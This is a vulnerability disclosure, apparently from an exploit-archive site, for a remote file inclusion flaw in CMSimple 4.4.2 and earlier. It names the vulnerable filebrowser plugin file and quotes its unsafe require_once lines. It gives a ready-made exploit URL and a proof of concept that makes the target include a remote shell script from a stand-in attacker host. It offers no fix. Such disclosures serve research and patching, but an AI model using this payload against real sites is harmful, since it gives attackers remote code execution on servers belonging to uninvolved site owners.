CMSimple 4.4.2 Remote File Inclusion

2014.04.18
Credit: NoGe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

============================================================================================================= [o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability Software : CMSimple - Open Source CMS with no database Version : 4.4, 4.4.2 and below Vendor : http://www.cmsimple.org Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database. All data are stored in a simple file system. ============================================================================================================= [o] Vulnerable File plugins/filebrowser/classes/required_classes.php require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php'; require_once $pth['folder']['plugin'] . 'classes/filebrowser.php'; ============================================================================================================= [o] Exploit http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI] ============================================================================================================= [o] PoC http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt? ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] April 17 2014 - Papua, Indonesia - Met Paskah! Tuhan berkati.. :)

References:

http://cxsecurity.com/issue/WLB-2014030166


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top